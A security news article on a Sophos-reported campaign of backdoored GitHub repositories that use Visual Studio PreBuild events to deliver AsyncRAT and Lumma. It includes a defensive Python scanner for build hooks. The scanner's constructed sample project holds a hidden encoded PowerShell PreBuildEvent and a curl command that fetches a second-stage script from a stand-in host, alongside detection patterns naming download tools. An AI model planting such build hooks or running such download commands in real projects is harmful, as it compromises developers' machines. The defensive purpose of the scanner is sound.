GitHub Malware Scam Tied to Single User, Hits Amateurs
A sprawling malware distribution campaign spans more than 140 GitHub repositories that target inexperienced cybercriminals and gaming cheat users with backdoored code, according to researchers at Sophos. The scheme, attributed to an operator linked to the email address ischhfd83@rambler.ru, dates back to at least November 2023.
Of the 141 repositories analyzed, 133 carried backdoors, usually disguised as game cheats or hacking tools. The most common backdoor is a Visual Studio PreBuild event: the hook fires as soon as a victim builds the project, starting a multi-stage chain that ends in obfuscated JavaScript which disables security tools and deploys malware including the AsyncRAT remote-access trojan and the Lumma information stealer.
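A PreBuild event is nothing more than a shell command stored in the project's .csproj or .vbproj file, so the practical check before building any cloned project is to look for build hooks and inspect what they run. The scanner below is an added example written for this article, not Sophos's tooling or code from the campaign; the sample project, its PowerShell command and the `example.invalid` URL are constructed, and the indicator patterns are heuristics chosen here, not a list published by Sophos.

```python
"""Scan an MSBuild project file (.csproj/.vbproj) for build-event hooks.

Added example, not Sophos's or the campaign's code. Build events and
<Exec> tasks run arbitrary commands on the developer's machine as soon
as the project is built, which is the hook the article describes.
"""
import re
import xml.etree.ElementTree as ET

# Element names that execute a command at build time.
HOOK_TAGS = {"PreBuildEvent", "PostBuildEvent", "Exec"}

# Heuristic indicators of a staged loader (chosen for this example).
SUSPICIOUS = [
    (re.compile(r"powershell|pwsh", re.I), "powershell invocation"),
    (re.compile(r"-(encodedcommand|enc|ec|e)\b", re.I), "encoded command flag"),
    (re.compile(r"frombase64string|\[convert\]::", re.I), "base64 decoding"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"cmd(\.exe)?\s*/c", re.I), "cmd /c wrapper"),
    (re.compile(r"\b(certutil|bitsadmin|curl|wget|mshta)\b", re.I), "download/LOLBin"),
    (re.compile(r"wscript|cscript|\.vbs\b|\.js\b", re.I), "script host / JS"),
]

# Constructed sample: one malicious PreBuildEvent, one benign PostBuildEvent,
# and an <Exec> task wired to run before Build. The base64 blob is a dummy.
SAMPLE_CSPROJ = """<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <AssemblyName>GameCheat</AssemblyName>
    <PreBuildEvent>powershell -w hidden -ep bypass -enc AAAA</PreBuildEvent>
    <PostBuildEvent>copy "$(ProjectDir)config.json" "$(TargetDir)"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -s https://example.invalid/stage2.js -o %TEMP%\\s.js" />
  </Target>
</Project>
"""


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace: '{uri}Name' -> 'Name'.

    Legacy projects declare the namespace, SDK-style projects do not,
    so matching on the local name handles both.
    """
    return tag.rsplit("}", 1)[-1]


def scan_project(xml_text: str) -> list[dict]:
    """Return every build hook in document order with its matched indicators."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in HOOK_TAGS:
            continue
        # <Exec> carries the command in an attribute; event elements in text.
        command = elem.get("Command", "") if name == "Exec" else (elem.text or "")
        command = command.strip()
        if not command:
            continue
        hits = [label for pat, label in SUSPICIOUS if pat.search(command)]
        findings.append({"hook": name, "command": command, "indicators": hits})
    return findings


def flagged(findings: list[dict]) -> list[dict]:
    """Keep only hooks that tripped at least one indicator."""
    return [f for f in findings if f["indicators"]]


if __name__ == "__main__":
    for f in scan_project(SAMPLE_CSPROJ):
        status = "SUSPICIOUS" if f["indicators"] else "ok"
        print(f"[{status}] {f['hook']}: {f['command'][:60]} {f['indicators']}")
```

Run it over every `*.csproj` and `*.vbproj` in a freshly cloned repository before opening the solution in Visual Studio; a hook that downloads or decodes anything is reason enough to stop, since the command runs with the developer's privileges before a single line of the project is compiled. The heuristics are deliberately loose and will flag some legitimate build steps, so treat a hit as a prompt to read the command, not as a verdict.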
Sophos traced the campaign after investigating Sakura RAT, a supposedly open-source remote access Trojan. The repositories show signs of automation, with some carrying tens of thousands of commits to mimic active development. The scale and automation suggest the operator runs a Distribution-as-a-Service (DaaS) offering of the kind seen in recent cybercrime trends.
